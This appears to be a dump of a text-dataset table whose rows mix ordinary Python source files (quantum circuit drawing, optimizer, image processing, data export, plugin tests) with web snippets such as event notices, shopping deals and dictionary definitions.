text
stringlengths 29
850k
|
---|
# -*- coding: utf-8 -*-
# Copyright 2020 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains a compiler engine which generates matplotlib figures describing the
circuit.
"""
from builtins import input
import re
import itertools
from projectq.cengines import LastEngineException, BasicEngine
from projectq.ops import FlushGate, Measure, Allocate, Deallocate
from projectq.meta import get_control_count
from ._plot import to_draw
# ==============================================================================
def _format_gate_str(cmd):
param_str = ''
gate_name = str(cmd.gate)
if '(' in gate_name:
(gate_name, param_str) = re.search(r'(.+)\((.*)\)', gate_name).groups()
params = re.findall(r'([^,]+)', param_str)
params_str_list = []
for param in params:
try:
params_str_list.append('{0:.2f}'.format(float(param)))
except ValueError:
if len(param) < 8:
params_str_list.append(param)
else:
params_str_list.append(param[:5] + '...')
gate_name += '(' + ','.join(params_str_list) + ')'
return gate_name
# ==============================================================================
class CircuitDrawerMatplotlib(BasicEngine):
"""
CircuitDrawerMatplotlib is a compiler engine which using Matplotlib library
for drawing quantum circuits
"""
def __init__(self, accept_input=False, default_measure=0):
"""
Initialize a circuit drawing engine(mpl)
Args:
accept_input (bool): If accept_input is true, the printer queries
the user to input measurement results if the CircuitDrawerMPL
is the last engine. Otherwise, all measurements yield the
result default_measure (0 or 1).
default_measure (bool): Default value to use as measurement
results if accept_input is False and there is no underlying
backend to register real measurement results.
"""
BasicEngine.__init__(self)
self._accept_input = accept_input
self._default_measure = default_measure
self._map = dict()
self._qubit_lines = {}
def is_available(self, cmd):
"""
Specialized implementation of is_available: Returns True if the
CircuitDrawerMatplotlib is the last engine
(since it can print any command).
Args:
cmd (Command): Command for which to check availability (all
Commands can be printed).
Returns:
availability (bool): True, unless the next engine cannot handle
the Command (if there is a next engine).
"""
try:
# Multi-qubit gates may fail at drawing time if the target qubits
# are not right next to each other on the output graphic.
return BasicEngine.is_available(self, cmd)
except LastEngineException:
return True
def _process(self, cmd): # pylint: disable=too-many-branches
"""
Process the command cmd and stores it in the internal storage
Queries the user for measurement input if a measurement command
arrives if accept_input was set to True. Otherwise, it uses the
default_measure parameter to register the measurement outcome.
Args:
cmd (Command): Command to add to the circuit diagram.
"""
# pylint: disable=R0801
if cmd.gate == Allocate:
qb_id = cmd.qubits[0][0].id
if qb_id not in self._map:
self._map[qb_id] = qb_id
self._qubit_lines[qb_id] = []
return
if cmd.gate == Deallocate:
return
if self.is_last_engine and cmd.gate == Measure:
if get_control_count(cmd) != 0:
raise ValueError('Cannot have control qubits with a measurement gate!')
for qureg in cmd.qubits:
for qubit in qureg:
if self._accept_input:
measurement = None
while measurement not in ('0', '1', 1, 0):
prompt = "Input measurement result (0 or 1) for qubit {}: ".format(qubit)
measurement = input(prompt)
else:
measurement = self._default_measure
self.main_engine.set_measurement_result(qubit, int(measurement))
targets = [qubit.id for qureg in cmd.qubits for qubit in qureg]
controls = [qubit.id for qubit in cmd.control_qubits]
ref_qubit_id = targets[0]
gate_str = _format_gate_str(cmd)
# First find out what is the maximum index that this command might
# have
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in itertools.chain(targets, controls))
# If we have a multi-qubit gate, make sure that all the qubit axes
# have the same depth. We do that by recalculating the maximum index
# over all the known qubit axes.
# This is to avoid the possibility of a multi-qubit gate overlapping
# with some other gates. This could potentially be improved by only
# considering the qubit axes that are between the topmost and
# bottommost qubit axes of the current command.
if len(targets) + len(controls) > 1:
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qb_id in itertools.chain(targets, controls):
depth = len(self._qubit_lines[qb_id])
self._qubit_lines[qb_id] += [None] * (max_depth - depth)
if qb_id == ref_qubit_id:
self._qubit_lines[qb_id].append((gate_str, targets, controls))
else:
self._qubit_lines[qb_id].append(None)
def receive(self, command_list):
"""
Receive a list of commands from the previous engine, print the
commands, and then send them on to the next engine.
Args:
command_list (list<Command>): List of Commands to print (and
potentially send on to the next engine).
"""
for cmd in command_list:
if not isinstance(cmd.gate, FlushGate):
self._process(cmd)
if not self.is_last_engine:
self.send([cmd])
def draw(self, qubit_labels=None, drawing_order=None, **kwargs):
"""
Generates and returns the plot of the quantum circuit stored so far
Args:
qubit_labels (dict): label for each wire in the output figure.
Keys: qubit IDs, Values: string to print out as label for
that particular qubit wire.
drawing_order (dict): position of each qubit in the output
graphic. Keys: qubit IDs, Values: position of qubit on the
qubit line in the graphic.
**kwargs (dict): additional parameters are used to update
the default plot parameters
Returns:
A tuple containing the matplotlib figure and axes objects
Note:
Additional keyword arguments can be passed to this
function in order to further customize the figure output
by matplotlib (default value in parentheses):
- fontsize (14): Font size in pt
- column_spacing (.5): Vertical spacing between two
neighbouring gates (roughly in inches)
- control_radius (.015): Radius of the circle for controls
- labels_margin (1): Margin between labels and begin of
wire (roughly in inches)
- linewidth (1): Width of line
- not_radius (.03): Radius of the circle for X/NOT gates
- gate_offset (.05): Inner margins for gates with a text
representation
- mgate_width (.1): Width of the measurement gate
- swap_delta (.02): Half-size of the SWAP gate
- x_offset (.05): Absolute X-offset for drawing within the axes
- wire_height (1): Vertical spacing between two qubit
wires (roughly in inches)
"""
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qubit_id in self._qubit_lines:
depth = len(self._qubit_lines[qubit_id])
if depth < max_depth:
self._qubit_lines[qubit_id] += [None] * (max_depth - depth)
return to_draw(
self._qubit_lines,
qubit_labels=qubit_labels,
drawing_order=drawing_order,
**kwargs,
)
|
9.30am to 10.30am Parent session - 'Communication and Connection: Developmental Opportunities in Nature Play' with Petria Allen, Speech Pathologist.
Please join us for a FREE session where we will learn and discuss, fun and simple outdoor play ideas to support development, the benefits of playing in local outdoor spaces and supporting communication development through play.
Wallaroo Primary School and Community OSHC will be running a free crèche if bookings show demand so book asap.
5.30-7.00pm Family Nature Play Twilight Session, with Petria Allen - bring the kids!
This is an active beach play session and families will be encouraged to dig, build, pretend and explore the range of ‘loose parts’ provided for play.
The beach session is a chance to try out the learning presented in the morning workshop.
Please note that this is not a swimming session, though playing in the shallows and using water as part of the play session is encouraged. Caregivers are responsible for their children at all times.
Please be ‘sun smart’ and dress appropriately for fun, active, messy, creative play! |
import datetime
import httplib
import urllib
import redis
import json
from datetime import timedelta
#now = datetime.datetime.now();
#today = now.strftime('%Y-%m-%d')
#print today
rdb = redis.Redis('localhost')
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def convfloat(value):
try:
return float(value)
except ValueError:
return -1
def convint(value):
try:
return int(value)
except ValueError:
return 0
def save2redis(key, value):
old = rdb.get("TW" + key)
if old is None:
val = []
val.append(value)
rdb.set("TW"+key ,json.dumps(val))
else:
l = json.loads(old)
l.append(value)
rdb.set("TW"+key ,json.dumps(l))
today = datetime.date.today()
one_day = timedelta(days=1);
start_day = datetime.date(2004, 2, 11);
#start_day = datetime.date(2015, 5, 14);
print "Import from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
dl_date = start_day
stocks = {}
dl_date = start_day
print "Start merge history"
while dl_date < today:
file_name = "data/" + dl_date.strftime("%Y%m%d") + ".csv"
f = open(file_name, 'r')
print "open " + file_name
lines = f.readlines()
for line in lines:
r = line.split('","')
if len(r) == 16:
head = r[0].split("\"")
sid = head[1].strip(" ")
#print head[1] + " " + r[2] + " " + convfloat(r[5])
#print r[2] #volume
#print r[5] #open
obj = {"volume": convint(r[2]), "open": convfloat(r[5]), "high": convfloat(r[6]), "low": convfloat(r[7]), "val": convfloat(r[8]), "date": dl_date.strftime("%Y-%m-%d"), "per": convfloat(r[15]), "buyQuantity": convint(r[12]), "buyPrice": convint(r[11]), "saleQuantity": convint(r[14]), "salePrice": convint(r[13])}
save2redis(sid, obj)
dl_date += one_day
|
during April or May (new students only, please).
Annual World Tai Chi & Qigong Day.
This year, the Jing Ying Institute, in conjunction with the Annapolis Towne Centre, will provide free workshops and demonstrations in front of PF Chang's. The first 50 attendees will receive gift bags with promotional items from local merchants. This event has been recognized with an official proclamation from Governor O'Malley.
Free Tai Chi Lecture & Class - The first part of the workshop will be a lecture on the health benefits of tai chi. After the talk, you will have the opportunity to practice basic tai chi moves. Click here for more details.
Free tai chi/qigong for health & fitness and tai chi for chronic conditions classes at Jing Ying from April through May. See the Jing Ying schedule for a list of available tai chi classes. (For new students only).
10:00 am - 10:30 am Lion Dance and Tai Chi demo by Jing Ying Institute of Kung Fu & Tai Chi (www.JingYing.org) and other groups. |
import math as math
import random as random
def get_data(n_points = 300, m = 2, b = 7, variance = 5):
y_train = [(m * x + b + random.uniform(-variance, variance)) for x in range(0, n_points)]
# x = [(m * x + b) for x in range(0, n_points)]
x_train = [x for x in range(0, n_points)]
return [x_train, y_train]
def func(x, theta_vector):
return (theta_vector[0] * x) + theta_vector[1]
# theta_store = [[1, 1]]
m_store = [[0.0, 0.0]]
v_store = [[0.0, 0.0]]
b1 = 0.9
b2 = 0.99
e = math.pow(10, -8)
alpha = 0.001
# using mse as the loss function:
def gradient_of_mse_loss(y, x, t, theta_store):
theta_vector = theta_store[t - 1]
scalar = 2*(y - func(x, theta_vector))
# print('scalar: ', scalar)
return [-x * scalar, -1 * scalar]
def gt(t, data, theta_store):
x_train = data[0]
y_train = data[1]
gradient_loss_sum = [0, 0]
for i in range(1, len(x_train)):
y = y_train[i]
x = x_train[i]
curr_g = gradient_of_mse_loss(y, x, t, theta_store)
gradient_loss_sum[0] += curr_g[0]
gradient_loss_sum[1] += curr_g[1]
return [gradient_loss_sum[0] / len(x_train), gradient_loss_sum[1] / len(x_train)]
def mt(t, data, theta_store):
old_m = m_store[t - 1]
temp1 = [b1 * old_m[0], b1 * old_m[1]]
scale = (1 - b1)
curr_g = gt(t, data, theta_store)
temp2 = [scale * curr_g[0], scale * curr_g[1]]
new_mt = [ temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(m_store) <= t:
m_store.append(new_mt)
return new_mt
def mtc(t, data, theta_store):
curr_m = mt(t, data, theta_store)
denom = 1 - math.pow(b1, t)
return [curr_m[0] / denom, curr_m[1] / denom]
def vt(t, data, theta_store):
curr_g = gt(t, data, theta_store)
curr_g_sq = [math.pow(curr_g[0], 2), math.pow(curr_g[1], 2)]
temp1 = [b2 * v_store[t - 1][0], b2 * v_store[t - 1][1]]
scale = (1 - b2)
temp2 = [scale * curr_g_sq[0], scale * curr_g_sq[1]]
new_vt = [temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(v_store) <= t:
v_store.append(new_vt)
return new_vt
def vtc(t, data, theta_store):
curr_vt = vt(t, data, theta_store)
denom = 1 - math.pow(b2, t)
return [curr_vt[0] / denom, curr_vt[1] / denom]
def theta_t(t, data, theta_store):
old_theta = theta_store[t - 1]
m = mtc(t, data, theta_store)
v = vtc(t, data, theta_store)
temp1 = [-alpha * m[0], -alpha * m[1]]
temp2 = [math.pow(v[0], 0.5) + e, math.pow(v[1], 0.5) + e]
temp3 = [temp1[0] / temp2[0], temp1[1] / temp2[1]]
new_theta = [old_theta[0] + temp3[0], old_theta[1] + temp3[1]]
if len(theta_store) <= t:
theta_store.append(new_theta)
return new_theta
def adam():
data = get_data()
theta_store = [[1, 1]]
not_converged = True
old_t = theta_store[0]
t = 1
while not_converged:
theta = theta_t(t, data, theta_store)
diff = math.pow(old_t[0] - theta[0], 2) + math.pow(old_t[1] - theta[1], 2)
old_t = theta
# if diff < 0.0000000000000001:
if diff < e:
not_converged = False
t += 1
print(theta, t)
# print('theta_store: ', theta_store)
# print('m_store: ', m_store)
# print('v_store: ', v_store)
return theta
adam()
|
So, if you want to calculate how many pounds are 8210 kilograms you can use this simple rule.
We have created this website to answer all this questions about currency and units conversions (in this case, convert 8210 kg to lbs). If you find this information useful, you can show your love on the social networks or link to us from your site. Thank you for your support and for sharing convertnation.com! |
#!/usr/bin/env python
unknownSample = "$NA$"
#####################################################################
# #
# Sentence class #
# #
#####################################################################
class Sentence:
default_encoding = "utf-8"
def __init__(self, raw, train=False, encoding="utf-8"):
self.raw = raw
self.sentence = "".join(raw.split()).decode(encoding).encode(self.default_encoding)
self.forms = [form.encode(self.default_encoding) for form in self.sentence.decode(encoding)]
self.tags = [unknownSample] * len(self.forms)
self.extra_tags = [unknownSample] * len(self.forms)
self.train = train
if train:
self.goldwords = self.raw.split()
self.goldtags = [unknownSample] * len(self.forms)
i = 0
for word in self.goldwords:
L = len(word.decode(self.default_encoding))
#print word, L
if L == 1:
self.goldtags[i] = "S"
else:
for j in range(L):
if j == 0:
self.goldtags[i + j] = "B"
elif j + 1 == L:
self.goldtags[i + j] = "E"
else:
self.goldtags[i + j] = "M"
i += L
def __str__(self):
L = len(self.forms)
if self.train:
return "\t".join(["%s_%s_%s_%s" % (self.forms[i],
self.goldtags[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
else:
return "\t".join(["%s_%s_%s" % (self.forms[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
def __len__(self):
return len(self.forms)
#####################################################################
# #
# Basic Segmemntor Class #
# #
# + segment #
# + valid #
# + tag_as_word #
# #
#####################################################################
class Segmentor:
def segment(self, sentence):
# for overwrite
pass
def valid(self, sentence, start, end):
ret = True
for i in range(start, end):
ret = ret and (sentence.tags[i] == unknownSample)
return ret
def tag_as_word(self, sentence, start, end, prefix, style):
if style == 2:
# tags in {"B", "I"} style
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
else:
sentence.tags[i] = prefix + "I"
elif style == 4:
# tag in {"B", "M", "E", "S"} style
if start + 1 == end:
sentence.tags[start] = prefix + "S"
else:
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
elif i + 1 == end:
sentence.tags[i] = prefix + "E"
else:
sentence.tags[i] = prefix + "M"
elif style == 6:
# tag in {"B0", "B1", "B2", "M", "E", "S"} style
pass
|
WebSite amisunmag.com is one of the 300 millions sites on the Internet. Second-level name is amisunmag with a length of 9 chars (bytes), first-level (top level domain, extension, zone) is .com. Site name contains following english words: sun. This website is down, abandoned or expired. |
import numpy as np
import cv2
from matplotlib import pyplot as plt
class VPoint:
A = 0
B = 1
C = 2
D = 3
ERROR = 10000000
def __init__(self, cx, cy):
self.cx = cx
self.cy = cy
def which(self, x, y):
if x < self.cx:
if y < self.cy:
return VPoint.A
else:
return VPoint.D
else:
if y < self.cy:
return VPoint.B
else:
return VPoint.C
def otsu(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
ret1, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)
# Otsu's thresholding
ret2, th2 = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# Otsu's thresholding after Gaussian filtering
# blur = cv2.GaussianBlur(img, (5, 5), 0)
blur = cv2.medianBlur(img, 5, 0)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# plot all the images and their histograms
images = [img, 0, th1,
img, 0, th2,
blur, 0, th3]
titles = ['Original Noisy Image', 'Histogram', 'Global Thresholding (v=127)',
'Original Noisy Image', 'Histogram', "Otsu's Thresholding",
'Gaussian filtered Image', 'Histogram', "Otsu's Thresholding"]
for i in range(3):
plt.subplot(3, 3, i * 3 + 1), plt.imshow(images[i * 3], 'gray')
plt.title(titles[i * 3]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 2), plt.hist(images[i * 3].ravel(), 256)
plt.title(titles[i * 3 + 1]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 3), plt.imshow(images[i * 3 + 2], 'gray')
plt.title(titles[i * 3 + 2]), plt.xticks([]), plt.yticks([])
plt.show()
def getSides(a):
# inverted = cv2.bitwise_not(a)
height, width = a.shape
xx = np.arange(width)
xy = np.arange(height)
a0 = np.argmax(a, axis=0)
a00 = np.argmax(a[::-1, :], axis=0)
a00 = height - a00
a1 = np.argmax(a, axis=1)
a11 = np.argmax(a[:, ::-1], axis=1)
a11 = width - a11
# a0 = np.nonzero(a0)
# a1 = np.nonzero(a1)
return xx, a0, a00, xy, a1, a11
def law_of_cosines(a, x, b):
xa = a - x
xc = b - x
# calculate angle
cosine_angle = np.dot(xa, xc) / (np.linalg.norm(xa) * np.linalg.norm(xc))
angle = np.arccos(cosine_angle)
return angle
# pAngle = np.degrees(angle)
def border(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
# Otsu's thresholding after Median filtering
blur = cv2.medianBlur(img, 17, 0)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
print('ret3 ' + str(ret3))
kernel = np.ones((30, 30), np.uint8)
dilate = cv2.dilate(th3, kernel, iterations=1)
dilate = th3
# h = th3.sum(0)
# v = th3.sum(1)
(xx, a0, a00, xy, a1, a11) = getSides(dilate)
# dh = np.diff(dh)
# dv = np.diff(dv)
# xh = np.arange(0, len(h))
# xdh = np.arange(0, len(dh))
plt.subplot(2, 2, 1)
plt.imshow(img, 'gray')
plt.title('original image'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 2, 2)
# plt.imshow(blur, 'gray')
# plt.title('median blure'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 3)
plt.imshow(th3, 'gray')
plt.title('otsu thresholding'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 4, 4)
# plt.imshow(a_r, 'gray')
# plt.title('reversed'), plt.xticks([]), plt.yticks([])
# plt.subplot(3,4,5)
# plt.plot(xx, a0,'r', xx, a00, 'g')
# plt.title('a0'), plt.xticks([]), plt.yticks([])
#
# plt.subplot(3,4,6)
# plt.plot(xy, a1, 'r', xy, a11, 'g')
# plt.title('a1'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 2)
nz0 = np.nonzero(a0)[0]
plt.plot(xx[nz0], a0[nz0], 'r', xx[nz0], a00[nz0], 'g')
plt.title('nz scan_x'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 4)
nz1 = np.nonzero(a1)[0]
plt.plot(a1[nz1], xy[nz1], 'r', a11[nz1], xy[nz1], 'g')
plt.title('nz scan_y'), plt.xticks([]), plt.yticks([])
plt.show()
def findCorners(img):
height, width = img.shape
cx = width / 2
cy = height / 2
vertex = VPoint(cx, cy)
print("cx = {cx}, cy = {cy}".format(**locals()))
xx = np.arange(width)
xy = np.arange(height)
scan_x = np.argmax(img, axis=0) # indexes of first white pixel
scan_xr = height - np.argmax(img[::-1, :], axis=0)
x_nz = np.nonzero(scan_x)[0]
scan_x_nz = scan_x[x_nz]
scan_xr_nz = scan_xr[x_nz]
np.save('../data/pickles/a', scan_x_nz)
# print(x_nz)
# print(scan_x_nz)
# print(scan_xr_nz)
# start finding vertexes
# lower line
x_left = x_nz[0]
y_left = scan_x_nz[0]
if y_left > cy:
y_left = scan_xr_nz[0]
x_right = x_nz[-1]
y_right = scan_x_nz[-1]
if y_right > cy:
y_right = scan_xr_nz[-1]
print(vertex.which(x_left, y_left))
print('x_left {x_left}, y_left {y_left}'.format(**locals()))
print(vertex.which(x_right, y_right))
print('x_right {x_right}, y_right {y_right}'.format(**locals()))
# min values for the lower line
ymin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
print('----------------')
scan_y = np.argmax(img, axis=1)
scan_yr = width - np.argmax(img[:, ::-1], axis=1)
y_nz = np.nonzero(scan_y)[0]
scan_y_nz = np.nonzero(scan_y)
scan_y_nz = scan_y[y_nz]
scan_yr_nz = scan_yr[y_nz]
yy_left = y_nz[0]
xx_left = scan_y_nz[0]
if xx_left > cx:
xx_left = scan_yr_nz[0]
yy_right = y_nz[-1]
xx_right = scan_y_nz[-1]
if xx_right > cx:
xx_right = scan_yr_nz[-1]
print(vertex.which(xx_left, yy_left))
print('xx_left {xx_left}, yy_left {yy_left}'.format(**locals()))
print(vertex.which(xx_right, yy_right))
print('xx_right {xx_right}, yy_right {yy_right}'.format(**locals()))
# min values for the lower line
xmin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
return (xx, scan_x, scan_xr, xy, scan_y, scan_yr)
if __name__ == '__main__':
file_path = '../data/colored/4.jpg'
img = cv2.imread(file_path, 0)
border(img) |
Every household needs a good set up prepware mixing bowls and these are amazing! I love mine. Right now on Amazon you can snag a Pyrex Prepware 3-Piece Mixing Bowl Set, Clear for ONLY $11.99 (that's 52% OFF!!) + FREE Super Saver Shipping ( when you purchase $35 in eligible products) or FREE 2 Day Shipping with Amazon Prime.
*Remember: Amazon Prices change often so you will want to hurry to snag this deal HERE. Thanks Addicted to Saving!
*TODAY ONLY* Up to 60% Off Select Gerber Hand Tools on Amazon!
**Remember this offer is for today only (2/17/14) while supplies last so you will want to hurry to take advantage of this awesome deal by going HERE!
*Today Only* Dyson Upright Vacuum Cleaner on sale 43% off on Amazon!
With Spring Cleaning time just around the corner, many of us are looking into getting new vacuum cleaners. For those of us in the market Amazon has some great news! Today only (while supplies last) you can snag a Dyson DC41 Animal Upright Vacuum Cleaner with Tangle-free Turbine Tool for Only $399 (thats 43% off!). Just head over HERE to view this amazon Deal of the Day.
:: Patented Radial Root Cyclone technology for no loss of suction. DC41 Animal captures allergens and expels cleaner air. Dyson cyclones can capture particles down to 0.5 microns – including pollen, mold and bacteria.
:: Strong suction power at the cleaner head. The cleaner head self-adjusts for optimal contact – even on hard floors.
:: Ball technology – turns on the spot. Steers easily around furniture, obstacles and into difficult places.
:: Lightweight and durable. Less weight and bulk.
**HURRY** Disney INFINITY Figures on SALE at Amazon!!
**Remember, prices on Amazon change quickly so you will want to HURRY to snag this great deal while you can. Will ship FREE for Amazon Prime members or if you purchase $35.00 worth of Amazon Prime eligible items.
Here is a fun deal for those with little children. Right now on Amazon you can snag Sesame Street – Learning About Letters for ONLY $5.00! (that's a 50% savings) Just head over HERE to view this DVD! + FREE Super Saver Shipping (if you purchase $35 in eligible items) or FREE two day shipping with Amazon Prime.
**Remember: Amazon prices change often, so you will want to hurry to snag this deal while it lasts! |
import os
import shutil
import logging
from pprint import pformat # noqa
from zipfile import ZipFile
from tempfile import mkdtemp
from flask import render_template
from normality import safe_filename
from followthemoney.helpers import entity_filename
from followthemoney.export.excel import ExcelExporter
from servicelayer.archive.util import checksum, ensure_path
from aleph.core import archive, db, settings
from aleph.queues import queue_task
from aleph.model import Export, Events, Role, Status, Entity
from aleph.index.entities import iter_proxies, checksums_count
from aleph.index.collections import get_collection
from aleph.logic.util import entity_url, ui_url, archive_url
from aleph.logic.notifications import publish
from aleph.logic.mail import email_role
log = logging.getLogger(__name__)
EXTRA_HEADERS = ["url", "collection"]
WARNING = """
This data export was aborted before it was complete, because the %s
exported entities exceeds the limits set by the system operators.
Contact the operator to discuss bulk exports.
"""
def get_export(export_id):
if export_id is None:
return
export = Export.by_id(export_id, deleted=True)
if export is not None:
return export.to_dict()
def write_document(export_dir, zf, collection, entity):
content_hash = entity.first("contentHash", quiet=True)
if content_hash is None:
return
file_name = entity_filename(entity)
arcname = "{0}-{1}".format(entity.id, file_name)
arcname = os.path.join(collection.get("label"), arcname)
log.info("Export file: %s", arcname)
try:
local_path = archive.load_file(content_hash, temp_path=export_dir)
if local_path is not None and os.path.exists(local_path):
zf.write(local_path, arcname=arcname)
finally:
archive.cleanup_file(content_hash, temp_path=export_dir)
def export_entities(export_id):
export = Export.by_id(export_id)
log.info("Export entities [%r]...", export)
export_dir = ensure_path(mkdtemp(prefix="aleph.export."))
collections = {}
try:
filters = [export.meta.get("query", {"match_none": {}})]
file_path = export_dir.joinpath("export.zip")
with ZipFile(file_path, mode="w") as zf:
excel_name = safe_filename(export.label, extension="xlsx")
excel_path = export_dir.joinpath(excel_name)
exporter = ExcelExporter(excel_path, extra=EXTRA_HEADERS)
proxies = iter_proxies(schemata=Entity.THING, filters=filters)
for idx, entity in enumerate(proxies):
collection_id = entity.context.get("collection_id")
if collection_id not in collections:
collections[collection_id] = get_collection(collection_id)
collection = collections[collection_id]
if collection is None:
continue
extra = [entity_url(entity.id), collection.get("label")]
exporter.write(entity, extra=extra)
write_document(export_dir, zf, collection, entity)
if file_path.stat().st_size >= settings.EXPORT_MAX_SIZE:
concern = "total size of the"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
if idx >= settings.EXPORT_MAX_RESULTS:
concern = "number of"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
exporter.finalize()
zf.write(excel_path, arcname=excel_name)
file_name = "Export: %s" % export.label
file_name = safe_filename(file_name, extension="zip")
complete_export(export_id, file_path, file_name)
except Exception:
log.exception("Failed to process export [%s]", export_id)
export = Export.by_id(export_id)
export.set_status(status=Status.FAILED)
db.session.commit()
finally:
shutil.rmtree(export_dir)
def create_export(
operation,
role_id,
label,
collection=None,
mime_type=None,
meta=None,
):
export = Export.create(
operation,
role_id,
label,
collection=collection,
mime_type=mime_type,
meta=meta,
)
db.session.commit()
return export
def complete_export(export_id, file_path, file_name):
export = Export.by_id(export_id)
file_path = ensure_path(file_path)
export.file_name = file_name
export.file_size = file_path.stat().st_size
export.content_hash = checksum(file_path)
try:
archive.archive_file(
file_path, content_hash=export.content_hash, mime_type=export.mime_type
)
export.set_status(status=Status.SUCCESS)
except Exception:
log.exception("Failed to upload export: %s", export)
export.set_status(status=Status.FAILED)
db.session.commit()
params = {"export": export}
role = Role.by_id(export.creator_id)
log.info("Export [%r] complete: %s", export, export.status)
publish(
Events.COMPLETE_EXPORT,
params=params,
channels=[role],
)
send_export_notification(export)
def delete_expired_exports():
"""Delete export files from the archive after their time
limit has expired."""
expired_exports = Export.get_expired(deleted=False)
for export in expired_exports:
log.info("Deleting expired export: %r", export)
if export.should_delete_publication():
if export.content_hash is not None:
counts = list(checksums_count([export.content_hash]))
if counts[0][1] == 0:
archive.delete_file(export.content_hash)
export.deleted = True
db.session.add(export)
db.session.commit()
def retry_exports():
for export in Export.get_pending():
queue_task(None, export.operation, export_id=export.id)
def send_export_notification(export):
download_url = archive_url(
export.content_hash,
file_name=export.file_name,
mime_type=export.mime_type,
expire=export.expires_at,
)
params = dict(
role=export.creator,
export_label=export.label,
download_url=download_url,
expiration_date=export.expires_at.strftime("%Y-%m-%d"),
exports_url=ui_url("exports"),
ui_url=settings.APP_UI_URL,
app_title=settings.APP_TITLE,
)
plain = render_template("email/export.txt", **params)
html = render_template("email/export.html", **params)
log.info("Notification: %s", plain)
subject = "Export ready for download"
email_role(export.creator, subject, html=html, plain=plain)
|
A representative of the Hagerstown police union says the department is desperate for more officers.
Police say a dispute led to two people being shot in the parking lot of a northwest side Autozone.
Theodore Kernan, 46, of Bridgewater allegedly broke into four stores, a Dunkin' Donuts where he crawled through the drive-thru window, police said.
Verb. The company supplied the necessary money. You'll have to supply your own food.. Noun. adequate supplies of fresh water He bought a month's supply of cigarettes. They took a month's worth of supplies on the camping trip. The town is in need of basic medical supplies. a store that sells art supplies The state is trying to disrupt the supply of illegal drugs.
a. producer phase--That phase of military supply that extends from determination of procurement schedules to acceptance of finished supplies by the Military Services. b. consumer phase--That phase of military supply which extends from receipt of finished supplies by the Military Services through issue for use or consumption.
The brindled cow, which has led us hither, will supply us with milk. Remember the interpositions of God to supply the necessities of the destitute. "We must do our best to supply the deficiency," said Morton, as he entered. The 'interviewer' may make use of it to supply him with 'copy,' but this remains to be seen.
Supply is an Auckland based creative design company specialising in identity and brand design, packaging design, print design, publication design and website design.
supply definition: 1. to provide something that is wanted or needed, often in large quantities and over a long period of time: 2. an amount of something that is available for use: 3. food or other things necessary for living: . Learn more.
Supply is a brand born out of dissatisfaction with the everyday essentials available to us. Starting with our single blade razors, we made it our mission to develop products purposefully with an obsessive dedication to quality, durability, & functionality. |
from unittest import TestCase
import re
from eizzek.lib.decorators import plugin, session_plugin
from eizzek.lib.registry import registry, session_registry
class PluginTest(TestCase):
def setUp(self):
registry.clear()
def test_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
assert registry.plugins.has_key('ping')
def test_named_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$', name='ping_plugin')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
assert registry.plugins.has_key('ping_plugin')
class SessionPluginTest(TestCase):
def setUp(self):
session_registry.clear()
def test_create_session_plugin(self):
assert 0 == len(session_registry.plugins)
@session_plugin
class Translate(object):
name = 'translate'
regex = r'^translate (?P<something>\w+)$'
assert 1 == len(session_registry.plugins)
assert session_registry.plugins.has_key('translate')
|
